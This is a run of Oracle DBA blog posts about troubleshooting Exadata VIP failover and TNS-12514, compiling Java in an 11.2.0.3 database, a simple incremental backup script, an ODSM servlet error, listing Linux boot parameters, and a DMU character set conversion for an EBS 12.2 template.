Thursday, October 30, 2014

Exadata/RAC -- Investigating TNS-12514/Vip failover/Tns failover/crs_relocate -- a detailed approach

Last week, a TNS-12514 error was reported for one of the Exadata nodes. During the problem hours, as you may guess, clients and application services could not establish their connections to the backend database server..


A workaround would be to use the second node (by changing the DNS) to reach the database, as in Exadata we have at least 2 db nodes working in the RAC infrastructure.

Using a load-balancing or failover-based TNS entry would also help, but the issue was critical and needed to be fixed immediately.

In the problematic environment, EBS 11i was used as the enterprise ERP application.. The number of clients that needed to connect to the database was less than 10, and the clients and the EBS techstack were using TNS entries based on the virtual IP addresses of the Exadata Database Machine nodes.
As 11i could not use the SCAN listener, I was lucky :) This meant fewer things to check :)
Note that, for SCAN listeners, you can check the following: http://ermanarslan.blogspot.com.tr/2014/02/rac-listener-configuration-in-oracle.html

Okay, I directly jumped onto the first node, because the TNS-12514 error was reported for the connections towards instance 1.

Before going further, I want to explain the TNS-12514 / ORA-12514 error briefly.

When you see this error, you can conclude that your connection request reached the listener, but the service name or SID you provided is not serviced by that listener. In other words, the database service that you specified in your connection request is not registered with the listener.
This may be a LOCAL_LISTENER parameter problem, or it may be a problem caused directly by the listener process.. Okay. We will see the details in the next paragraphs..
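As a first concrete check, you can verify whether the service is registered by running lsnrctl services <listener_name> on the node. Here is a minimal sketch of that check against a hypothetical output excerpt; the service name PROD and the output text below are illustrative, not taken from this system:

```shell
# Hypothetical excerpt of `lsnrctl services` output; on a real node you would
# capture it with something like: sample_output=$(lsnrctl services LISTENER)
sample_output='Service "PROD" has 1 instance(s).
  Instance "PROD1", status READY, has 1 handler(s) for this service...'

service="PROD"
if printf '%s\n' "$sample_output" | grep -q "Service \"$service\""; then
  echo "registered"
else
  echo "not registered -> check LOCAL_LISTENER and the listener state"
fi
```

If the service is missing from the output, the instance has not registered with that listener, which is exactly the TNS-12514 situation.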

So, when I connected to the first node, I saw that the listener was running. Actually, that was expected, because the error was not a "no listener" error. Still, I directly restarted it.. I wanted to have a clean environment..

While starting the listener, I saw the following in my terminal.

<msg time='2014-10-26T10:54:16.302+02:00' org_id='oracle' comp_id='tnslsnr'
 type='UNKNOWN' level='16' host_id='osrvdb01.somexampleerman.net'
 host_addr='10.10.10.100'>
 <txt>Error listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=exa01-vip)(PORT=1529)(IP=FIRST)))
 </txt>
</msg>
<msg time='2014-10-26T10:54:16.302+02:00' org_id='oracle' comp_id='tnslsnr'
 type='UNKNOWN' level='16' host_id='exa01.blabla.net'
 host_addr='10.10.10.100'>
 <txt>TNS-12545: Connect failed because target host or object does not exist
 TNS-12560: TNS:protocol adapter error
  TNS-00515: Connect failed because target host or object does not exist
   Linux Error: 99: Cannot assign requested address

Okay, the problem was there.. Especially this line ->
Error listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=exa01-vip)

On the other hand, this was not the reason behind the problem; it was the result of the problem.
The real causes were the following lines:
 TNS-00515: Connect failed because target host or object does not exist
   Linux Error: 99: Cannot assign requested address

So, this was the error stack, and as it is a stack, we can understand that the first error raised was Linux Error 99.

Linux Error 99, which came from the Exadata compute node's operating system (Oracle Linux), means;

errno.h:
99 EADDRNOTAVAIL Cannot assign requested address
Wow what a surprise! :)
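You can also look the error number up on the node itself; a quick sketch, assuming python3 is available on the compute node:

```shell
# Map errno 99 to its symbolic name and message, straight from the OS.
python3 -c 'import errno, os; print(errno.errorcode[99], "-", os.strerror(99))'
# -> EADDRNOTAVAIL - Cannot assign requested address (on Linux)
```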

I guess the Listener uses bind() here ->

int bind (int socket, struct sockaddr *addr, socklen_t length)

And it failed because the specified address exa01-vip was not available on this database node.

The code could be something like the following (a sketch);

#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int rc;
int s = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in myname;
memset(&myname, 0, sizeof(myname));
myname.sin_family      = AF_INET;
myname.sin_port        = htons(1529);
myname.sin_addr.s_addr = inet_addr("192.168.0.91");  /* virtual ip address of Node1 */
rc = bind(s, (struct sockaddr *) &myname, sizeof(myname));
/* I guess at this point, bind() fails and errno is set to EADDRNOTAVAIL */

"TNS-00515: Connect failed because target host or object does not exist" was also saying the same think , but in Oracle's Language..

Okay..
After analyzing the above, I used the ifconfig command to see whether the VIP was there or not..
Indeed, the ifconfig output did not list the VIP..

Then I tried to ping the VIP.. The ping was okay. The IP was up, but not on its original node (node 1 in this case).. So it was normal to get an error while starting the associated listener..
When I logged in to the 2nd node and ran ifconfig, I saw that the VIP interface of the 1st node was up on the 2nd node.
So my thoughts were right.. The VIP of node 1 was not present on the 1st node.. On the other hand, it was present on the 2nd node, and this was the cause of the problem..

But why and how was this VIP interface migrated to the 2nd node?

To answer these questions, I first checked the syslog messages of the Linux running on node 1, and saw the following;

Oct 26 09:10:33 osrvdb01 kernel: igb: eth2 NIC Link is Down
Oct 26 09:10:33 osrvdb01 kernel: igb: eth1 NIC Link is Down
Oct 26 09:10:33 osrvdb01 kernel: bonding: bondeth0: link status down for idle  interface eth1, disabling it in 5000 ms.
Oct 26 09:10:33 osrvdb01 kernel: bonding: bondeth0: link status down for idle  interface eth2, disabling it in 5000 ms.
Oct 26 09:10:38 osrvdb01 kernel: bonding: bondeth0: link status definitely down for interface eth1, disabling it
Oct 26 09:10:38 osrvdb01 kernel: bonding: bondeth0: link status definitely down for interface eth2, disabling it

So the problem was obvious: there was a failure in the network links behind the virtual interface.. (Note that the client had made a system operation and changed the switches :), so this was a result of that.. It was not Exadata's fault :))
So the Linux on node 1 detected these link errors and disabled the bondeth0 interface.
It was normal that disabling bondeth0 made the public IP and the virtual IPs of node 1 unavailable on node 1.. And as a result, they were migrated to the 2nd node.. (This is RAC :))

Now, we come to the point of finding the "thing" that migrated this VIP interface from node 1 to node 2.

To find it, I checked the RAC logs..

In the listener log, which was located under the Grid home, the listener was saying "I'm no longer listening on exa01-vip". This was consistent, because when I first checked the server, I saw that the listener was up but could not listen on the VIP address..

Then I checked crsd.log;

In the crsd log, I saw the following;

Received state change for ora.net1.network exadb01 1 [old state = ONLINE, new state = OFFLINE]

So, it seems crsd understood that the network related to the problematic interface went down..

I saw the restart attempts, too..

CRS-2672: Attempting to start 'ora.net1.network' on 'exadb01'

The attempts were failing..

CRS-2674: Start of 'ora.net1.network' on 'exadb01' failed
quencer for [ora.net1.network exadb01 1] has completed with error: CRS-0215: Could not start resource 'ora.net1.network'.


Then I saw that the VIP was failed over.. It was migrated from node 1 to node 2 as follows;

2014-10-26 10:21:56.371: [   CRSPE][1178179904] {0:1:578} RI [ora.exadb01.vip 1 1] new external state [INTERMEDIATE] old value: [OFFLINE] on ecadb02 label = [FAILED OVER]
2014-10-26 10:21:56.371: [   CRSPE][1178179904] {0:1:578} Set LAST_SERVER to exadb02 for [ora.exadb01.vip 1 1]
2014-10-26 10:21:56.371: [   CRSPE][1178179904] {0:1:578} Set State Details to [FAILED OVER] from [ ] for [ora.exadb01.vip 1 1]
2014-10-26 10:21:56.371: [   CRSPE][1178179904] {0:1:578} CRS-2676: Start of 'ora.exadb01.vip' on 'exadb02' succeeded

So, the failover was done by the Clusterware...

Okay.. But what was the advantage or benefit of this failover? This question comes to mind, as the clients were still not able to connect to PROD1 even though the corresponding VIP was failed over and up on node 2.

The purpose of this failover is to make the VIP of node 1 available on node 2. Thus, connection attempts by clients towards node 1's listener/VIP encounter "no listener" errors immediately, without waiting for the TCP timeout..
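The fail-fast behavior itself is plain TCP: when an IP address is up but nothing listens on the port, the operating system refuses the connection immediately instead of letting the client wait for a TCP timeout. A small sketch, assuming a bash-like shell and that port 45111 is closed on localhost:

```shell
# An up-and-running IP with a closed port fails instantly with "connection
# refused" -- the same reason a failed-over VIP lets a client move on to the
# next ADDRESS in its TNS entry without waiting for a TCP timeout.
if ! (exec 3<>/dev/tcp/127.0.0.1/45111) 2>/dev/null; then
  echo "refused immediately, no timeout"
fi
```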

Of course, the clients should use a TNS entry that supports this kind of failover, like the following;

PROD =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = exavip1)(PORT = 1521))
    (ADDRESS = (PROTOCOL = TCP)(HOST = exavip2)(PORT = 1521))
    (CONNECT_DATA =
      (SERVICE_NAME = PROD)
    )
  )

So, by using a TNS entry like the one above, clients will first go to exavip1; they will reach the VIP and encounter the error immediately.. Then they will go to the second VIP and connect to the database..
This is the logic of using VIPs in Oracle RAC.

Okay. So far so good. We analyzed the problem, found the causes, and saw the mechanism that performed the failover.. Now we will see the solution..

The solution I applied was as follows;

[root@exa02 bin]# crs_relocate ora.exadb01.vip
Attempting to stop `ora.exadb01.vip` on member `exadb02`
Stop of `ora.exadb01.vip` on member `exadb02` succeeded.
Attempting to start `ora.exadb01.vip` on member `exadb01`
Start of `ora.exa01.vip` on member `exadb01` succeeded.
Attempting to start `ora.LISTENER.lsnr` on member `exadb01`
Attempting to start `ora.LISTENER_PROD.lsnr` on member `exadb01`
Start of `ora.LISTENER_PROD.lsnr` on member `exadb01` succeeded.

So , I basically used the crs_relocate utility...

Here is the general definition of the crs_relocate utility.

The crs_relocate command relocates applications and application resources as specified by the command options that you use and the entries in your application profile. The specified application or application resource must be registered and running under Oracle Clusterware in the cluster environment before you can relocate it.


That is it.
In this article, we have seen a detailed approach for diagnosing network errors in Exadata (actually, in RAC)..
We have seen the VIP failover and the logic of using VIPs in RAC.
Lastly, we have seen the crs_relocate utility, used to migrate the VIP back to its original location/node.

I hope you will find it useful.. Feel free to comment.

Sunday, October 26, 2014

RDBMS, Java -- Working with the Java inside the Oracle Database

It all started with a Java source compilation error. The problematic code was a Java source that was being compiled inside the Oracle Database..
The code was written to make a remote web service call from the Oracle Database using Java. The creation script started as follows;

CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "BLABLA"
AS import java.io.BufferedReader;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.Reader;
import java.nio.charset.Charset;
import java.sql.Clob;
import java.sql.SQLException;
import javax.xml.soap.MessageFactory;
import javax.xml.soap.MimeHeaders;
import javax.xml.soap.SOAPConnection;
import javax.xml.soap.SOAPConnectionFactory;

import javax.xml.soap.SOAPException;
import javax.xml.soap.SOAPMessage;

public class WebServiceCall {
private static SOAPMessage getSoapMessageFromString(String xml) throws SOAPException, IOException {
MessageFactory factory = MessageFactory.newInstance();
SOAPMessage message = factory.createMessage(new MimeHeaders(), new ByteArrayInputStream(xml.getBytes(Charset.forName("UTF-8"))));
return message;
}

......

And it continued like that, without any syntax errors. It actually compiled in an 11.2.0.4 Oracle database without any problems, but when it came to compiling it in an 11.2.0.3 Oracle database, the customer had troubles, which made me write this post..

As you may expect, the Java source could not be compiled on 11.2.0.3..
The key errors were as follows;

09:54:01 AS import java.io.BufferedReader;
09:54:01 ...
09:54:02 ORA-24344: compilation error
09:56:01 Start Compiling 1 object(s) ...
09:56:01 Executing ALTER JAVA SOURCE blabla COMPILE ...
09:56:02 [0:0] blabla:10: cannot find symbol
09:56:02 [0:0] symbol : class MessageFactory
09:56:02 [0:0] location: package javax.xml.soap
09:56:02 [0:0] import javax.xml.soap.MessageFactory;
09:56:02 [0:0] blabla:11: cannot find symbol
09:56:02 [0:0] symbol : class MimeHeaders
09:56:02 [0:0] location: package javax.xml.soap
09:56:02 [0:0] import javax.xml.soap.MimeHeaders;
09:56:02 [0:0] blabla:12: cannot find symbol
09:56:02 [0:0] symbol : class SOAPConnection
09:56:02 [0:0] location: package javax.xml.soap
..
...
.....

And a lot more ....

Okay, the cause of these errors was the JDK embedded inside the Oracle Database.. It was clear that some packages could not be found, especially javax.xml.soap..

The developers were thinking that at least Oracle 11.2.0.4 was needed to compile such a Java source, as it was clear that 11.2.0.3 didn't have the necessary Java packages.. That's why an 11.2.0.4 upgrade was requested immediately..
On the other hand, the customer's DBA didn't approve this request, because it was only about a single Java object.
At this point, I stepped in, made the following analysis, and solved the problem without a need to upgrade the entire database.
It was a productive day, which made me practice Java.

First of all, there is no document or whitepaper saying that 11.2.0.4 is needed for compiling this kind of Java source object..
The only statement I could find from Oracle was: "Release 11.2.0.4 provides an enterprise class platform, Oracle JVM, for developing and deploying server-based Java applications."

So, this could mean that the enterprise Java packages (like SOAP) were coming by default in 11.2.0.4.
That seemed to be true, because the Java source compiled without any errors in 11.2.0.4.
However, we had 11.2.0.3, so we needed to find a solution in place.

First, I checked the component status in the registry using the following query;
I was interested in the Java Virtual Machine status and the Oracle Database Java Packages status.

Select comp_name, status, version
from dba_registry ;

COMP_NAME                               STATUS   VERSION
OWB                                     VALID    11.2.0.3.0
Oracle Application Express              VALID    3.2.1.00.12
Oracle Enterprise Manager               VALID    11.2.0.3.0
OLAP Catalog                            VALID    11.2.0.3.0
Spatial                                 VALID    11.2.0.3.0
Oracle Multimedia                       VALID    11.2.0.3.0
Oracle XML Database                     VALID    11.2.0.3.0
Oracle Text                             VALID    11.2.0.3.0
Oracle Expression Filter                VALID    11.2.0.3.0
Oracle Rules Manager                    VALID    11.2.0.3.0
Oracle Workspace Manager                VALID    11.2.0.3.0
Oracle Database Catalog Views           VALID    11.2.0.3.0
Oracle Database Packages and Types      VALID    11.2.0.3.0
JServer JAVA Virtual Machine            VALID    11.2.0.3.0
Oracle XDK                              VALID    11.2.0.3.0
Oracle Database Java Packages           VALID    11.2.0.3.0
OLAP Analytic Workspace                 VALID    11.2.0.3.0
Oracle OLAP API                         VALID    11.2.0.3.0
Oracle Real Application Clusters        VALID    11.2.0.3.0

Everything seemed okay..
Then I checked for the SOAP package.. I was interested in its presence..

select *
from dba_objects
where object_type like '%JAVA%'
and owner = 'SYS'
and object_name like '%soap%'

Okay, the problem was as expected.. The SOAP package was missing. That is, it was not coming by default in 11.2.0.3.. So it seemed we had to install/load these kinds of missing packages manually using jars...
Okay, good, but there were no references for this kind of operation, especially for SOAP.
Maybe that was the reason that made the developers think of 11.2.0.4 as the one and only solution.
Only the following document was making sense, but it wasn't a point shot, and unfortunately it was for older releases:
How to Load Soap.jar into Oracle Database (Doc ID 344799.1)
It was not answering questions like which SOAP package to use, where to download it, what the dependencies are, etc..

On the other hand, there was a document in Oracle Support for doing these kinds of web service operations using PL/SQL rather than Java:
Using UTL_DBWS to Make a Database 11g Callout to a Document Style Web Service (Doc ID 841183.1)

Although this document seemed unrelated, it had an excellent reference to a jar file..
In the 4th step of this document, it was saying: "Load the necessary core web services callout jar files into the database. This step is to load the core Java components and is a completely separate action from loading the PL/SQL package as described in the previous steps. This means that the considerations for completing this step are entirely different from the loading of the PL/SQL components."

The load mentioned here was done by using the dbwsclientws.jar and dbwsclientdb11.jar files.
These jar files are located in the UTL_DBWS utility, which can be downloaded from Oracle Support. Download the latest copy of the UTL_DBWS utility zip file from the Oracle Technology Network (OTN). This file, for an 11g database, is named dbws-callout-utility-10131.zip.

By using the following sequence of commands, the loading of the SOAP package could be done;
cd $ORACLE_HOME/sqlj/lib (replacing $ORACLE_HOME with the proper directory structure)
loadjava -u username/password -r -v -f -s -grant public -genmissing dbwsclientws.jar dbwsclientdb11.jar

The customer loaded those jars, and as expected, loading these jars brought the SOAP Java packages into the database :)

So far so good; no further manual load effort was needed, but this time other compilation errors were encountered..

14:31:13 Executing ALTER JAVA SOURCE blabla COMPILE ...
14:31:13 [0:0] blabla:21: cannot find symbol
14:31:13 [0:0] symbol : method getBytes(java.nio.charset.Charset)
14:31:13 [0:0] location: class java.lang.String
14:31:13 [0:0] SOAPMessage message = factory.createMessage(new MimeHeaders(), new ByteArrayInputStream(xml.getBytes(Charset.forName("UTF-8"))));
14:31:13 [0:0] ^
14:31:13 [0:0] blabla:31: cannot find symbol
14:31:13 [0:0] symbol : method isEmpty()
14:31:13 [0:0] location: class java.lang.String
14:31:13 [0:0] if(outputParameterText.isEmpty() == false){
14:31:13 [0:0] ^
14:31:13 [0:0] 2 errors
14:31:13 Compilation complete - 11 error(s) found
14:31:13 End Compiling 1 object(s)


This time, the compiler was complaining that java.lang.String had no getBytes(java.nio.charset.Charset) method and no isEmpty() method..

I checked the Java package using the following;

select *
from dba_objects
where object_type like '%JAVA%'
and owner = 'SYS'
and object_name like '%java/nio%'

It was there.. Oracle Database 11.2.0.3 had java.nio.charset.Charset, so what was the problem?

The problem had to be the methods themselves.. I knew that String.getBytes(Charset) and String.isEmpty() both come with JDK 1.6, so the JDK in this release had to be below 1.6..


According to Oracle Support, the JDKs (or let's say JVMs) shipped in the Oracle Database releases were as follows;

Executing the same java stored procedure on Oracle 10.1, 10.2, 11.1, 11.2 and 12.1 databases will show following results for JVM version:

Oracle 10.1 runs java.vm.version=1.4.1
Oracle 10.2 runs java.vm.version=1.4.2
Oracle 11.1 runs java.vm.version=1.5.0_01
Oracle 11.2 runs java.vm.version=1.6.0_43
Oracle 12.1 runs java.vm.version=1.6.0_43 or higher

But I had doubts about this info, as it might have been referring to Oracle Database 11.2.0.4 when saying "Oracle 11.2 runs java.vm.version=1.6.0_43".

Then I checked the JDK version of Oracle Database using the following support doc..

How To Determine The JDK Version Used by the Oracle JVM in the Database (Doc ID 131872.1)

The result was as I expected;

The JDK in 11.2.0.4 Oracle Database was 1.6, but the JDK in 11.2.0.3 Oracle Database was 1.5...

So this error was expected..

The idea of upgrading the JDK residing in the Oracle Database from 1.5 to 1.6 seemed utopic, and it was also not supported.

Thus, I had to find another solution in place. 

With this in mind, I suggested changing one line in the problematic Java source: I recommended passing the charset name directly, using the older getBytes(String charsetName) overload, which has been available since JDK 1.1 (see the Javadoc excerpt below)..


java.lang.String

public byte[] getBytes(String charsetName) throws UnsupportedEncodingException

Encodes this String into a sequence of bytes using the named charset, storing the result into a new byte array.

The behavior of this method when this string cannot be encoded in the given charset is unspecified. The CharsetEncoder class should be used when more control over the encoding process is required.

Parameters: charsetName - the name of a supported charset
Returns: the resultant byte array
Throws: UnsupportedEncodingException - if the named charset is not supported
Since: JDK 1.1

Modify this line;

....................ByteArrayInputStream(xml.getBytes(Charset.forName("UTF-8"))));

To be like the following;

.....................................ByteArrayInputStream(xml.getBytes("UTF8")));


This was the action needed to compile this Java source with a 1.5 JDK, and it solved the remaining compilation problems.. It saved the day :)


Through this incident, I realized once again that being a senior/principal Oracle DBA / Apps DBA consultant requires having a good developer perspective, too..
No need to say that using Oracle Support efficiently is a must for being successful.
One last thing about the Java dependency in Oracle Database: upgrading its JDK seems unsupported.
Alternatively, you can develop your Java code on the OS tier, if that satisfies your needs.. You can have several JDKs on the OS tier, and you can upgrade them if needed..
One other alternative is to use PL/SQL for web service operations, as mentioned in the following doc:
Using UTL_DBWS to Make a Database 11g Callout to a Document Style Web Service (Doc ID 841183.1) .. UTL_DBWS will make you use Java indirectly :)

Okay, that's all for now.. Hope you'll find this useful.

Thursday, October 23, 2014

Linux bash-- primitive Incremental backup script

The following is a little script that can take incremental backups, in a way.. It might come in handy.

 find SOURCE_DIR -type f -mtime -2 -exec cp -rfp --parents {} TARGET_DIR \;

What this script does is;

it finds the files modified within the last 2 days (-mtime -2) and copies these files to the backup location with the same directory structure..

An example:

[root@ermanhost/]# tree /test2
/test2   --> Backup location.

0 directories, 0 files --> empty.

[root@ermanhost /]# tree /test
/test --> Our Source directory ,which has sub directories and files in it.
`-- dir1
    |-- dir2
    |   |-- dir3
    |   |   `-- testfile1
    |   `-- testfile2
    `-- testfile3

3 directories, 3 files
[root@ermanhost /]# find /test -type f -mtime -2 -exec cp -rfp --parents {} /test2/ \;
[root@tegvoracle /]# tree /test2
/test2  --> That's it. Our Backup is taken with the same directory structure as you see below
`-- test
    `-- dir1
        |-- dir2
        |   |-- dir3
        |   |   `-- testfile1
        |   `-- testfile2
        `-- testfile3

4 directories, 3 files

To test further, I can add a new file and run the script again..

[root@ermanhost /]# touch /test/dir1/testfile4
[root@ermanhost /]# find /test -type f -mtime -2 -exec cp -rfp --parents {} /test2/ \;
[root@ermanhost /]# tree /test2
/test2
`-- test
    `-- dir1
        |-- dir2
        |   |-- dir3
        |   |   `-- testfile1
        |   `-- testfile2
        |-- testfile3
        `-- testfile4  --> Here, the new file is copied with the same directory structure as its source..
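The one-liner above can also be wrapped into a tiny self-contained script. The directories below are created with mktemp just for illustration; substitute your real source and backup locations. Note that cp --parents replicates the source's full path under the target:

```shell
SRC=$(mktemp -d)   # example source directory (use your real one)
DST=$(mktemp -d)   # example backup location
mkdir -p "$SRC/dir1/dir2"
touch "$SRC/dir1/dir2/testfile1"

# Copy files modified within the last 2 days, preserving the directory tree.
find "$SRC" -type f -mtime -2 -exec cp -rfp --parents {} "$DST" \;

# --parents recreated the full source path under $DST:
ls "$DST$SRC/dir1/dir2/testfile1"
```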

Monday, October 20, 2014

OID 11g-- Analysis , http-500 internal server error in ODSM, http://hostname:port/odsm

In one of our customers' OID environments, which was integrated with EBS and SSO, the clients were encountering an HTTP-500 Internal Server Error while trying to reach the Oracle Directory Services Manager (ODSM) URL..


The problematic URL was used for managing the OID configuration, like checking the attributes, etc.
The error was reported as follows;

The OID system is working properly, but we can't open its management interface to control the configuration or its attributes.. In the past, when we saw the error, we would just refresh the web page and were able to continue our work, but nowadays refreshing the web page does not fix the problem anymore..
Also, when we restart the OID services, the problem disappears for a while.. On the other hand, this is not an applicable solution for us.. In Oracle Support, it is said that the error may be related to browser certifications, but in our case this is not relevant.

Okay..  
When I checked Oracle Support, I saw that one of the workarounds was restarting the managed server..
Case 3 in the document "CheckList For OID 11g ODSM Page Launching / Loading / Displaying Problems Or Errors (Doc ID 972416.1)" was mentioning the restart as a workaround..
But this workaround could not be applied as a solution in this case, because the error was being encountered periodically and repeatedly.

So, I requested the OID's managed server log for analysis.
The managed server name was wls_ods1, which is the default one...
After setting the domain environment, the log file could be reached via the following directory path;
$MW_HOME/user_projects/domains/domain_name/servers/server_name/logs

Analyzing the log file of a WebLogic server is like debugging a Java program to me.
I basically searched for the word "Exception", which led me to the following..

<[ServletContext@1709139423[app:odsm module:/odsm path:/odsm spec-version:2.5 version:11.1.1.2.0]] Servlet failed with Exception
java.lang.RuntimeException: java.lang.Exception: MDSLockedSessionManager already registered. Can't register more than one.
.....
.....
Caused By: java.lang.Exception: MDSLockedSessionManager already registered. Can't register more than one.
at oracle.adf.share.mds.MDSTransManager.registerMDSLockedSessionManagerInst(MDSTransManager.java:132)
at oracle.adf.share.mds.MDSTransManager.registerMDSLockedSessionManager(MDSTransManager.java:124)

So it was obvious that the exception "java.lang.RuntimeException: java.lang.Exception: MDSLockedSessionManager already registered. Can't register more than one" was the cause I was looking for, because the log was saying that the servlet had failed, and the path was reflecting the ODSM application.
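The search itself is a one-line grep against the managed server log. Here is a sketch against a synthetic log file; the real file lives under the $MW_HOME/.../logs path given above, and the log lines below are illustrative:

```shell
# Build a tiny synthetic wls_ods1.log excerpt and search it the same way.
log=$(mktemp)
cat > "$log" <<'EOF'
<Notice> Server state changed to RUNNING
<Error> Servlet failed with Exception
java.lang.RuntimeException: MDSLockedSessionManager already registered.
EOF

grep -n "Exception" "$log"   # prints the matching lines with line numbers
```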

After finding the low-level cause of the problem, I jumped into Oracle Support and found the following document: Accessing ODSM 11g 11.1.1.7 Intermittently Fails with: java.lang.Exception: MDSLockedSessionManager already registered. Can't register more than one. (Doc ID 1586149.1)

Finally, this document brought me to the following bug: Bug 17997221.
To get the patch for this bug, the customer needed to open an SR with Oracle Support.
The plan was that, once obtained, the patch would be applied to the ORACLE_COMMON home of the OID installation..
This Oracle home hosts the binaries, libraries, and JRF files which are used for controlling Fusion Middleware..

I will write the conclusion of this story when the patch is applied, but I'm sure this action plan will fix the problem.

Linux -- list current boot parameters

You may need to list the current boot parameters while your Linux system is running.. These parameters are boot arguments.. When the kernel is booted directly by the BIOS, you can be sure that no additional/unexpected arguments were given on the fly; but when the kernel is booted by a boot loader such as GRUB, additional arguments can be supplied on the fly, and this may cause you some problems with your enterprise applications.

Let's take a look at the boot arguments;

The Linux kernel accepts certain 'command-line options' or 'boot time parameters' at the moment it is started. In general this is used to supply the kernel with information about hardware parameters that the kernel would not be able to determine on its own, or to avoid/override the values that the kernel would otherwise detect.

Any argument not recognized by the kernel that contains a '=' is treated as an environment variable declaration, such as 'TERM=vt100'. Arguments which are not picked up by the kernel and are not recognized as environment variables are passed to the init process; the argument 'single' is a good example of this type..

The following is an example of editing the kernel boot parameters before the boot operation using the GRUB boot loader.. For instance, the string 'single' can be added to the end of the kernel line; this argument instructs the system to boot in single-user mode and not launch all the usual daemons.


You can get the full list of these parameters using the following link;
http://man7.org/linux/man-pages/man7/bootparam.7.html

Okay, we have seen the boot arguments/parameters so far; let's see how to get the list of current boot parameters of a running Linux operating system;

Usually, the bootloader passes the boot parameters to the kernel command line, which is an in-memory buffer.
We can reach the kernel command line via the /proc filesystem, and the following is the command we are looking for :)
cat /proc/cmdline

/proc/cmdline is a read-only file that holds the arguments passed to the Linux kernel at boot time. (Do not confuse it with /proc/[pid]/cmdline, which holds the command line of an individual process.)
Example:
cat /proc/cmdline 
OUTPUT:
ro root=/dev/VolGroup00/LogVol00 rhgb quiet

As you can see from the example output above, the system in this example was booted with the ro, root, rhgb, and quiet arguments..
So we can understand that the root filesystem is initially mounted read-only (ro), the root filesystem is located on LogVol00 (root=...), the boot was done using Red Hat Graphical Boot, a GUI tool with a boot splash screen (rhgb), and lastly, the detailed kernel messages were hidden during the boot (quiet)..
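To list the parameters one per line (for example, to grep for a specific argument), the single space-separated line in /proc/cmdline can simply be split:

```shell
# Print the running kernel's boot parameters, one per line.
tr ' ' '\n' < /proc/cmdline
```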

Friday, October 17, 2014

EBS 12.2-- DMU, character set migration, required for "EBS 12.2 VM templates"

It is not so easy to find databases with the ASCII character set these days; at least in Europe, we usually create our databases with a UTF8 character set..
Also, when we talk about Turkey, I can say that we at least use WE8ISO8859P9, which supports Turkish characters..

Meanwhile, the characters we need are not the only thing affecting our decision to choose a character set..
Nowadays, the new releases of applications such as Hyperion require us to have a database with at least a UTF8 character set.

Even so, as you may expect, there are still some databases which come with the ASCII character set by default..

The database bundled with Oracle's EBS 12.2 template is a good example of this kind of database.
It comes with an ASCII database, and that's why it is impossible to apply an NLS language patch on top of its application tier. In other words, it is not possible to make it support multiple languages (such as American English and Turkish).

In the past, I remember that converting a character set from one to another was a big deal.. (if the source character set is not a subset of the target)

Nowadays, fortunately, we have stable tools to convert our databases from ASCII to UTF8, AL32UTF8, etc. automatically, as you will see in the real example below..

Okay... We have done this conversion twice already for EBS 12.2, and I can say that it works..

So, if you have a virtualized Oracle environment (like a virtualized ODA X4, or any hardware that runs Oracle VM Server), importing the Oracle EBS 12.2 templates is a good way to deploy EBS 12.2..
You may find a real life EBS 12.2 template installation example in the following link:
http://ermanarslan.blogspot.com.tr/2014/05/ovm-oracle-vm-server-328-installation.html

It is fast and requires less effort, but you have got to consider converting the character set, too..

In the following example, we'll convert an ASCII EBS 12.2.3 database to AL32UTF8.
We do this operation using the Oracle Database Migration Assistant for Unicode (DMU), as follows...

http://www.oracle.com/technetwork/database/database-technologies/globalization/dmu/learnmore/start-334681.html

First, we install the required PL/SQL package in the database:

Start an SQL*Plus session in the Oracle Home of your database,
log in with SYSDBA credentials, and run the script prvtdumi.plb as follows:

$ sqlplus / as sysdba
SQL*Plus: Release 11.2.0.2.0 Production
Copyright (c) 1982, 2010, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - Production
With the Partitioning, Oracle Label Security, OLAP, Data Mining
and Real Application Testing options
SQL>@?/rdbms/admin/prvtdumi.plb
Library created.
Package created.
No errors.
Package body created.
No errors.

The DMU requires JDK 6. Note, however, that there is no need to install a separate JDK; just set the database environment and run the DMU.

Next, download and install the DMU software:

The DMU is available from its OTN download page. It is also available from My Oracle Support (MOS) as Patch 18392374.

To install the DMU, extract the downloaded archive into any target directory using an unzip utility for your platform.

Then, Start the tool:

$ chmod u+x dmu.sh

$ ./dmu.sh

Create a database connection:



Install the DMU repository:

If you connect to a database for the first time, the DMU automatically prompts you to install the repository. If you are not prompted to install the repository, you can install it by right-clicking the database you want to use and selecting Configure DMU Repository. You can also select Configure DMU Repository from the Migration menu. In all of these cases, the Repository Configuration Wizard appears.



To install the Migration Repository:

On the first page of the wizard, the only choice available is Install the repository in migration mode. After selecting this, click Next. The second page of the Repository Configuration Wizard is then shown.




Here, you select the target character set for the migration. We choose AL32UTF8.



On the third page, you can select the tablespace in which you want to install the repository.

Click Finish to install the repository.

Now, you are ready to begin the migration process to Unicode, as described in the DMU documentation. You will scan the database to identify convertibility issues, cleanse the database from these issues, and run the actual conversion step.


Start the migration process

Scanning :





In the scan phase, the DMU may report an invalid representation for the rows that have territory='KR' in the XDO.XDO_TRANS_UNIT_VALUES table.

We update these rows as follows (followed by a commit);

UPDATE XDO.XDO_TRANS_UNIT_VALUES SET value='CORRUPTED' WHERE territory='KR';

After this update, it may report errors again, this time for 4 rows...

To fix these rows, we can use the DMU's editor.
When we click on a problematic row, the tool displays the problematic characters painted in red. We delete these characters and start a new scan.

Note that you cannot convert your character set without correcting these errors.

At the last step, we start the convert operation, and we are done.

Important: If you need to convert the application tier's character set, you need to follow Appendix A in the document below (Doc ID 393861.1). On the other hand, this step is not required if you import an EBS 12.2 template;
the application tier of the EBS 12.2 template already comes with the UTF8 character set.


R12.0 / R12.1 : Globalization Guide for Oracle Applications Release 12 (Doc ID 393861.1)

Tuesday, October 14, 2014

Linux/LVM -- Online Migration of Oracle Database

Using LVM migration techniques, it is possible to migrate an Oracle database online.
Oracle will probably not support this, and I don't know who to blame if it fails.
But I made the test: an 11gR2 database was migrated while the sessions were active, and no errors or warnings appeared in the alert log.

The approach is based on the lvconvert command.
